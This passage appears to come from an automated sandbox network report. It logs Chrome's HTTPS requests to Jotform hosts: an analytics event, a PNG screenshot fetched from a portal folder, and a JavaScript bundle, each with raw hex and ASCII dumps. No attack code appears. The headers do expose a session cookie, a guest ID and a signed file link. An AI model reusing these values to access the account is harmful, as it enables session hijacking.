                                                                                                                                                                                                                                            Data Ascii: {extension:e,isPreview:i})=>{const{iconType:n,fileClass:t="",wrapperClassName:o}=G[e]||G.Unsupported,r=(0,s.jsx)(W.Z,{}),l=(0,s.jsxs)("div",{className:`filePreviewHolder ${t} ${o}`,children:[n||r,e&&!n&&(0,s.jsx)("span",{className:"fileType",children:e})]
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC1369INData Raw: 69 65 77 55 72 6c 3a 75 28 29 2e 73 74 72 69 6e 67 7d 29 2c 65 78 74 65 6e 73 69 6f 6e 3a 75 28 29 2e 73 74 72 69 6e 67 7d 2c 69 65 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 66 69 6c 65 3a 7b 7d 2c 65 78 74 65 6e 73 69 6f 6e 3a 22 22 7d 3b 76 61 72 20 6e 65 3d 69 65 2c 74 65 3d 6e 28 22 32 30 33 36 36 22 29 2c 6f 65 3d 6e 28 22 34 33 33 38 32 22 29 2c 73 65 3d 6e 28 22 31 31 35 37 37 22 29 2c 72 65 3d 6e 28 22 34 35 30 33 34 22 29 2c 6c 65 3d 6e 2e 6e 28 72 65 29 3b 63 6f 6e 73 74 20 61 65 3d 28 65 2c 69 3d 22 32 2e 31 34 2e 33 30 35 22 29 3d 3e 7b 76 61 72 20 6e 2c 74 3b 6c 65 74 20 6f 3d 22 22 3b 73 77 69 74 63 68 28 21 30 29 7b 63 61 73 65 21 21 28 6e 75 6c 6c 3d 3d 3d 28 6e 3d 77 69 6e 64 6f 77 2e 5f 5f 6a 66 72 6f 75 74 65 72 29 7c 7c 76 6f 69 64
                                                                                                                                                                                                                                            Data Ascii: iewUrl:u().string}),extension:u().string},ie.defaultProps={file:{},extension:""};var ne=ie,te=n("20366"),oe=n("43382"),se=n("11577"),re=n("45034"),le=n.n(re);const ae=(e,i="2.14.305")=>{var n,t;let o="";switch(!0){case!!(null===(n=window.__jfrouter)||void


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            97192.168.2.1749811104.19.129.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:20 UTC850OUTGET /action?actor=guest_5a3c5173c0bb4f63&action=DocumentPreviewed&target=%7B%22portalID%22:%22250092704521347%22,%22portalType%22:%22APP%22,%22itemID%22:%221%22,%22device%22:%22desktop%22,%22isPWA%22:false%7D&project=portal-app&ref=https:%2F%2Feu.jotform.com%2Fapp%2F250092704521347 HTTP/1.1
                                                                                                                                                                                                                                            Host: events.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            Accept: application/json, text/plain, */*
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC494INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:20 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            access-control-allow-headers: origin, content-type, accept
                                                                                                                                                                                                                                            access-control-allow-methods: POST, GET, OPTIONS
                                                                                                                                                                                                                                            access-control-allow-origin: https://eu.jotform.com
                                                                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                            expires: Thu, 1 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 07:36:20 GMT
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb64ed86d8ca1-EWR


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            98192.168.2.174981234.107.251.1254435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC642OUTGET /jufs/Gittens_Murray/form_files/Screenshot%202025-01-10%20at%2002.51.26.678100df0e5de0.10817411.png?md5=My-OIzLTfKJ5W-I8bVcA3w&expires=1736510726 HTTP/1.1
                                                                                                                                                                                                                                            Host: eu-files.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC504INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            access-control-allow-headers: Content-Type, Content-Length, Accept-Encoding, X-CSRF-Token, Authorization, accept, origin, Cache-Control, X-Requested-With, newrelic, traceparent, tracestate
                                                                                                                                                                                                                                            access-control-allow-methods: OPTIONS, GET
                                                                                                                                                                                                                                            access-control-allow-origin: *
                                                                                                                                                                                                                                            cache-control: public,max-age=7200
                                                                                                                                                                                                                                            content-type: image/png
                                                                                                                                                                                                                                            date: Fri, 10 Jan 2025 12:36:21 GMT
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC886INData Raw: 33 34 64 66 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 82 00 00 00 60 08 06 00 00 00 10 01 75 b4 00 00 0a b2 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 97 07 54 53 d9 16 86 cf bd e9 8d 92 40 04 a4 84 de 91 4e 00 29 21 b4 50 04 e9 60 23 24 01 02 21 84 40 50 11 3b 83 43 19 51 44 a4 d9 d0 41 11 05 47 a5 c8 58 b1 60 1b 14 0b 76 07 44 04 d4 71 b0 60 43 e5 5d 60 11 66 e6 ad f7 de 7a 7b ad 93 fd 65 df 7d f7 d9 e7 ac 73 d6 fa 2f 00 14 4d ae 44 22 82 95 00 48 13 67 49 c3 fc bc 18 31 b1 71 0c dc 10 20 03 08 90 00 15 a0 b9 bc 4c 09 2b 34 34 08 20 36 ed ff 6e 1f 7a 90 5c c4 6e 59 4e d4 fa f7 e7 ff d5 94 f9 82 4c 1e 00 50 28 c2 09 fc 4c 5e 1a c2 c7 90 f1 81 27 91 66 01 80 3a 88 c4 f5 97 66 49 26 f8 06 c2 2a 52 a4 41 84 9f 4d 70 d2
                                                                                                                                                                                                                                            Data Ascii: 34dfPNGIHDR`uiCCPICC ProfileHTS@N)!P`#$!@P;CQDAGX`vDq`C]`fz{e}s/MD"HgI1q L+44 6nz\nYNLP(L^'f:fI&*RAMp
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 68 7f 74 24 9a 87 ce 40 af 42 17 a3 ab d0 fb d1 2d e8 f3 e8 5b e8 3e f4 08 fa 3b 86 82 d1 c4 98 63 5c 30 1c 4c 0c 26 09 b3 14 93 8f 29 c7 d4 61 9a 31 17 30 77 30 03 98 0f 58 2c 96 8e 35 c6 3a 61 fd b1 b1 d8 14 ec 0a 6c 31 76 3b b6 09 7b 06 db 8d ed c7 8e e2 70 38 75 9c 39 ce 0d 17 82 e3 e2 b2 70 f9 b8 4a dc 41 dc 69 dc 4d dc 00 ee 13 9e 84 d7 c1 db e2 7d f1 71 78 31 7e 1d be 1c 7f 00 7f 0a 7f 13 3f 88 1f 23 28 11 0c 09 2e 84 10 02 9f b0 9c 50 42 d8 4b 68 27 5c 27 0c 10 c6 88 ca 44 63 a2 1b 31 82 98 42 5c 4b ac 20 36 12 2f 10 1f 11 df 91 48 24 3d 92 33 69 3e 49 48 5a 43 aa 20 1d 26 5d 22 f5 91 3e 93 a9 64 33 32 9b bc 90 2c 23 6f 24 ef 23 9f 21 df 27 bf a3 50 28 46 14 4f 4a 1c 25 8b b2 91 52 4f 39 47 79 42 f9 a4 40 53 b0 52 e0 28 f0 15 56 2b 54 2b b4 28 dc
                                                                                                                                                                                                                                            Data Ascii: ht$@B-[>;c\0L&)a10w0X,5:al1v;{p8u9pJAiM}qx1~?#(.PBKh'\'Dc1B\K 6/H$=3i>IHZC &]">d32,#o$#!'P(FOJ%RO9GyB@SR(V+T+(
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: b7 d4 1a d5 96 ef c1 ee c9 de f3 7c 6f d4 de ce 9f 99 3f d7 d7 69 d4 15 d5 7d db 27 de d7 bb 3f 6c ff f9 7a a7 fa fa 03 9a 07 4a 1a e0 06 59 c3 f0 c1 85 07 6f 1c f2 3e d4 d6 68 d9 b8 bb 89 de 54 74 18 1c 96 1d 7e f1 4b fc 2f 3d 47 02 8f 74 1c 65 1e 6d 3c 66 78 ac a6 99 d6 5c d8 02 b5 2c 6f 19 69 4d 6e ed 6d 8b 6d eb 3e 1e 70 bc a3 dd b5 bd f9 57 ab 5f f7 9d d0 3d 51 7d 52 f5 64 c9 29 e2 a9 bc 53 e3 a7 73 4e 8f 9e 91 9c 79 75 36 e9 6c 7f c7 92 8e 87 e7 62 ce dd 3e 3f ff 7c d7 85 c0 0b 97 2e fa 5e 3c d7 c9 ea 3c 7d c9 ed d2 89 cb 2e 97 8f 5f 61 5e 69 bd ea 78 b5 e5 9a c3 b5 e6 df 1c 7e 6b ee 72 ec 6a b9 ee 74 bd ed 86 f3 8d f6 ee b9 dd a7 6e 7a dc 3c 7b cb fb d6 c5 db 9c db 57 ef cc bb d3 dd 13 d9 73 ef ee c2 bb bd f7 f8 f7 86 ee 8b ee bf 79 90 fd 60 ec e1
                                                                                                                                                                                                                                            Data Ascii: |o?i}'?lzJYo>hTt~K/=Gtem<fx\,oiMnmm>pW_=Q}Rd)SsNyu6lb>?|.^<<}._a^ix~krjtnz<{Wsy`
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a 14 8a a0 99 33 40 31 fd 82 02 05 05 0a 0a 14 8a a0 e0 81 82 02 05 05 0a 0a 34 73 0a e4 52 04 2d 5b b6 0c ad 5a b5 0a 6d db b5 0b 1d 3a b4 0f 6d da b4 0d 2d 5b b6 08 6d 5a b7 09 ed e4 b3 96 f2 dd b9 b3 67 c3 99 86 33 e1 74 fd 69 7d 3d 7b f6 5c 38 7d ba 3e 9c 38 71 32 d4 9f 3a 15 1a 1a 1a c2 59 f9 4d 5a a3 af 4e 9d 3a 85 76 ed db e9 cf 4e 9d 3c 15 0e 1f 3e 1c 4e c9 f5 b4 d6 ad 5b eb 78 fc 8e 7f ad 5a b7 d2 cf ab f5 1f f7 dc 70 e6 cc 85 fb d4 79 cb 98 cc b5 9a ad e1 4c 83 ce 89 79 f1 ef 8c 8c 49 f3 f3 af 74 4c d6 e0 d8 f1 63 01 fa 45 e9 6e eb 08 7d 6b 3a d6 84 36 6d db e8 10 9e ce 79 c7 f5
                                                                                                                                                                                                                                            Data Ascii: 3@14s3@14s3@14sR-[Zm:m-[mZg3ti}={\8}>8q2:YMZN:vN<>N[xZpyLyItLcEn}k:6my
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 8c da da ba 6a 0d a1 fd 30 06 73 5b bc 68 71 58 b2 78 b1 8e c9 17 7e fe 95 0e ba 76 ed 9a f0 f2 4b 2f eb 18 71 f3 61 9c 9b 6f b9 59 ac d1 11 3a c4 b6 6d 5b 55 11 2c 5a b8 28 97 25 63 f7 67 74 b2 7e a1 57 dc fc ec f7 f6 8a 01 81 b0 1f 79 e5 95 e1 fa 99 d7 87 91 23 47 2a 34 88 35 da 56 bc 8a 12 3c d4 46 21 13 78 ab e4 e2 9f 87 86 ce f3 16 6b b6 54 78 ea b9 3f 3d 17 56 0b 8f 35 a5 f9 79 18 7d f0 6e 4f 0a 1f 2f 5d ba 34 3c fb cc 1f c2 f2 65 cb 9b e4 81 d8 bc e1 e5 db ef b8 5d bd 60 f6 93 41 43 9e ef fd 9c fc 3e e0 fb 2c f4 f6 fd f8 f7 c3 47 0c 17 be b8 45 f7 17 63 c0 3b 71 7c 64 d7 f9 fb e0 7d 5a 6b 38 2b f0 8c ac db 19 a1 27 30 1f 5e 1e 56 3a 02 73 a1 18 2e 6b d7 ac 4d b5 d8 93 d6 27 69 4c 64 10 50 a2 42 8a 02 0f a1 88 8e c8 de de be 7d 9b f0 f9 2a e1 97 d5
                                                                                                                                                                                                                                            Data Ascii: j0s[hqXx~vK/qaoY:m[U,Z(%cgt~Wy#G*45V<F!xkTx?=V5y}nO/]4<e]`AC>,GEc;q|d}Zk8+'0^V:s.kM'iLdPB}*
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 40 be 37 4d 65 9a 0d 8f 02 6c 17 45 30 40 88 a3 02 52 16 19 4b 35 cd 55 f2 82 d0 2b 02 13 20 25 0b 9c 20 6e db 58 ba 60 c1 13 cf 18 2b 84 c5 d5 aa 11 85 11 67 81 fb 8b 11 38 e0 8a 66 c9 9b 67 c1 6b 5c f3 1e 0a 96 b7 59 e2 ea 59 88 87 11 d7 f0 48 c0 bc a1 2d 02 c0 e8 e7 e7 8f 45 ff e4 63 4f a8 65 1f d7 4f d2 67 d0 1b a6 a1 7f fa 36 6b d3 6f 24 2c 51 04 29 0d 46 dc 28 6b 9c c7 92 b1 f1 7d bf e5 14 81 29 f4 29 c2 a8 77 dc 79 a7 58 c4 23 f4 3e 18 ff 03 31 18 56 2c 5f 7e 51 11 c8 1c 10 c2 ac bd 79 78 c4 a5 d8 d8 04 27 99 df 2e 51 78 79 82 73 76 df fe d5 cf 63 f8 88 11 8d 04 34 4a 1b 8c 95 0d ce 46 67 c3 57 d2 0c 82 61 fe e0 ca cc 03 43 ab 95 04 8b 89 c7 2d 15 4b f0 52 54 04 40 79 69 fb ac b4 7f 4b c6 22 06 e2 e0 21 83 05 17 1f a6 8a 10 da 63 f0 20 f8 d8 f7 e0
                                                                                                                                                                                                                                            Data Ascii: @7MelE0@RK5U+ % nX`+g8fgk\YYH-EcOeOg6ko$,Q)F(k}))wyX#>1V,_~Qyx'.Qxysvc4JFgWaC-KRT@yiK"!c
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 95 db 6e 55 97 02 46 05 c6 01 33 43 d3 46 d3 1b 7d 27 d5 7e 5f 28 82 f4 ac a9 a6 d2 db 6f 24 53 90 e0 ac e0 ef fd 04 0a 01 9b 24 d3 02 b7 36 cd a5 8c de 4b 52 bf 49 96 e1 a5 a2 08 8c 3e fb 24 95 8f 1c 79 36 25 9e 01 41 c9 67 9e fe bd 0a 2c 85 00 45 90 67 69 96 a7 3f 4d 14 01 ee 3f d0 2b 82 82 0d 0a 4c 36 52 ac 48 94 0d 70 6c 73 f0 08 cc b2 66 df 7f ff 5f 1f 52 88 08 41 8c 22 f8 e5 2f fe 4f 31 f6 28 5d 3d 9f e5 55 04 d6 97 41 3a 33 64 1d 30 86 d6 08 1c fa e8 23 bf 15 4f 66 8e 06 ad 11 e6 69 4d 83 c4 22 6c 31 00 af b9 f6 f3 9a 2c f3 ca 5f ff aa 69 9e 20 29 9c 05 00 92 ae 11 78 68 f6 07 1f e8 7c e6 4a 26 58 52 b6 a4 1f cb ef 0f 2c 7e 3c e5 b9 b3 e7 6a 5f fe 1c 8b 79 3a 78 9a 77 7d e3 1b 82 e8 0c 53 4f 9e 18 05 8a 60 99 c4 67 93 a0 29 55 04 b6 10 68 90 7b ee
                                                                                                                                                                                                                                            Data Ascii: nUF3CF}'~_(o$S$6KRI>$y6%Ag,Egi?M?+L6RHplsf_RA"/O1(]=UA:3d0#OfiM"l1,_i )xh|J&XR,~<j_y:xw}SO`g)Uh{
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 6c 16 5a c5 fd 26 69 1e 40 40 94 47 e1 60 22 d0 10 07 c1 a8 0d 43 ca 20 96 e0 3c 39 f9 99 76 7f 3e 4d 92 da 37 d1 83 7b d4 34 6a 4e 8a c0 af 3f 16 2f 55 58 8f 4a a0 38 ed c0 9e 5f 9f bc 82 cf cb 3b fa 03 f2 c4 f8 c8 52 ab ca af 23 07 4d 91 93 c8 4b e4 a6 c5 8a 50 70 c4 21 90 67 28 38 ce 4d e0 75 ab b2 96 e0 31 fc 9c a5 99 c7 94 14 04 3e 70 60 bf c2 53 a4 fd 33 16 2d cf 01 34 7e af 8a a0 a9 96 85 61 7c 58 73 fc a3 76 48 5a 8b ab 87 1d fd 7d a1 08 1a 2b 02 dc 64 dc 4d ca 79 64 69 58 a5 58 1b 28 10 2c 4e 7f 70 ce 6f 24 af 08 4c 60 fb 60 18 01 3c f0 4d 04 de 7b 72 b2 76 93 d4 66 89 e6 5b 67 ed d7 cf c1 62 05 28 1c 94 cf 00 39 6d 4a 6a 1e c1 53 32 99 a8 2a 8a 22 e0 88 3c f9 e5 fb f6 51 b2 5b aa 49 4a ae b6 55 aa ac 26 74 59 6e 1e 58 b2 33 3e f7 39 dd 74 d3 24
                                                                                                                                                                                                                                            Data Ascii: lZ&i@@G`"C <9v>M7{4jN?/UXJ8_;R#MKPp!g(8Mu1>p`S3-4~a|XsvHZ}+dMydiXX(,Npo$L``<M{rvf[gb(9mJjS2*"<Q[IJU&tYnX3>9t$
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: cb 46 a7 df 25 22 cc a2 59 44 78 10 04 ee 80 4c c8 5e 68 2a bd 6d e3 51 76 01 45 50 52 08 03 54 19 a0 28 e0 25 3c 04 04 29 c1 45 6a 61 b1 b9 b1 42 d3 36 74 94 47 e2 fe ce 4a 1f ea ce 53 0b 06 7e 05 72 c0 a2 7c 34 e6 64 2a ca 2b 9a 95 e7 83 c4 94 53 a0 e5 e5 fb 4f ab 22 28 f7 3c 02 1e 38 04 2c 84 25 0b e4 89 50 26 3b d1 e2 09 54 60 4d 6b 7e 7d ca 3d 8f 80 20 2d c9 0e f0 27 c5 23 37 49 09 7a 9e b7 81 07 a7 b1 37 e1 97 2c cd af 23 0a 7d b3 28 ae 95 62 88 2c 14 99 86 77 11 d7 2c 06 86 7c cc 12 0c 8f eb 83 cf cc 30 43 c6 52 0b 8e e0 30 fb 0d 68 1e c3 83 14 ef 67 7e ff 7b 85 a8 d8 03 28 b6 ac ad 2a 8a 80 0d c9 e2 40 6c 36 3f ef a3 8d fa 2c 54 f9 23 98 81 50 41 fb 17 8a 20 4a a1 c6 7f 7b 81 90 b7 fa 28 27 5e cf ca 3f 7d c0 bb 30 08 01 dd 68 f3 1b a9 9c c0 b6 f5
                                                                                                                                                                                                                                            Data Ascii: F%"YDxL^h*mQvEPRT(%<)EjaB6tGJS~r|4d*+SO"(<8,%P&;T`Mk~}= -'#7Iz7,#}(b,w,|0CR0hg~{(*@l6?,T#PA J{('^?}0h
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1390INData Raw: 64 ac a1 14 b2 34 84 3f 71 52 e2 44 f0 04 d9 7d 95 54 af cd 3b ff 2c f7 a6 8a c0 36 38 35 5f b0 5c b0 60 70 a7 60 e4 3c d8 5d d2 80 85 22 f8 6c 28 02 5b 5f cb 22 2a 3d 0a 6f 96 3e c8 06 8b 8a 4d f1 ee 3b ef ea a3 f1 a8 ae 89 60 fa 7b 7a 04 5e 00 55 ab 8c b5 df 68 e5 14 a5 0f 22 92 d6 4a 36 15 69 a6 dc 23 25 34 a8 34 4a 0c 25 ad 14 45 5e 45 e0 a1 29 c6 e2 8c 07 0f 39 07 22 cb fa 8c 5c 5b 57 82 f3 18 85 f6 c0 16 02 e0 60 da 40 59 3f fb ef ff d1 2c 1b fb 6d f4 d5 af 03 df 65 59 77 0c 8a 9b 6e ba 29 60 80 22 23 78 36 6f 16 ec de af 4f 39 45 60 f7 6a 79 f8 f6 08 c7 ee dd bb 69 c2 03 46 03 0a 08 8f 16 fc de d7 b2 f2 eb 8b f7 12 97 14 60 e3 24 bd 7a 68 15 45 5e 49 d0 b8 d2 f9 27 dd 17 9f ab 22 b0 68 34 07 33 6e be e5 66 c5 3c 49 73 e2 44 67 35 2c 8c 42 11 7c b6
                                                                                                                                                                                                                                            Data Ascii: d4?qRD}T;,685_\`p`<]"l([_"*=o>M;`{z^Uh"J6i#%44J%E^E)9"\[W`@Y?,meYwn)`"#x6oO9E`jyiF`$zhE^I'"h43nf<IsDg5,B|


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            99192.168.2.1749813104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC386OUTGET /s/portal/674ac14411e/static/js/5083.cbf741f8.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:21 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 10892
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:26:55 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "ef7d0daf7c7d4a4debbc94603be8497a"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 1
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6529aa77c9f-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC943INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 32 66 30 39 36 39 66 66 2d 30 62 30 34 2d 35 31 30 61 2d 38 61 65 33 2d 36 36 38 37 65 62
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="2f0969ff-0b04-510a-8ae3-6687eb
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 6e 6f 77 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 44 61 74 65 2e 6e 6f 77 28 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 75 28 74 29 7b 63 61 6e 63 65 6c 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 74 2e 69 64 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 2c 65 29 7b 76 61 72 20 72 3d 63 28 29 3b 76 61 72 20 6e 3d 7b 69 64 3a 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 66 75 6e 63 74 69 6f 6e 20 6f 28 29 7b 63 28 29 2d 72 3e 3d 65 3f 74 2e 63 61 6c 6c 28 6e 75 6c 6c 29 3a 6e 2e 69 64 3d 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 6f 29 7d 29 29 7d 3b 72 65 74 75 72 6e 20 6e 7d 76 61 72 20 64 3d
                                                                                                                                                                                                                                            Data Ascii: now?function(){return performance.now()}:function(){return Date.now()};function u(t){cancelAnimationFrame(t.id)}function f(t,e){var r=c();var n={id:requestAnimationFrame((function o(){c()-r>=e?t.call(null):n.id=requestAnimationFrame(o)}))};return n}var d=
                                                                                                                                                                                                                                            2025-01-10 12:36:21 UTC1369INData Raw: 6d 73 52 65 6e 64 65 72 65 64 3d 76 6f 69 64 20 30 2c 72 2e 5f 63 61 6c 6c 4f 6e 49 74 65 6d 73 52 65 6e 64 65 72 65 64 3d 6c 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 72 2e 70 72 6f 70 73 2e 6f 6e 49 74 65 6d 73 52 65 6e 64 65 72 65 64 28 7b 6f 76 65 72 73 63 61 6e 53 74 61 72 74 49 6e 64 65 78 3a 74 2c 6f 76 65 72 73 63 61 6e 53 74 6f 70 49 6e 64 65 78 3a 65 2c 76 69 73 69 62 6c 65 53 74 61 72 74 49 6e 64 65 78 3a 6e 2c 76 69 73 69 62 6c 65 53 74 6f 70 49 6e 64 65 78 3a 6f 7d 29 7d 29 29 2c 72 2e 5f 63 61 6c 6c 4f 6e 53 63 72 6f 6c 6c 3d 76 6f 69 64 20 30 2c 72 2e 5f 63 61 6c 6c 4f 6e 53 63 72 6f 6c 6c 3d 6c 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 20 72 2e 70 72 6f 70 73 2e 6f 6e 53
                                                                                                                                                                                                                                            Data Ascii: msRendered=void 0,r._callOnItemsRendered=l((function(t,e,n,o){return r.props.onItemsRendered({overscanStartIndex:t,overscanStopIndex:e,visibleStartIndex:n,visibleStopIndex:o})})),r._callOnScroll=void 0,r._callOnScroll=l((function(t,e,n){return r.props.onS
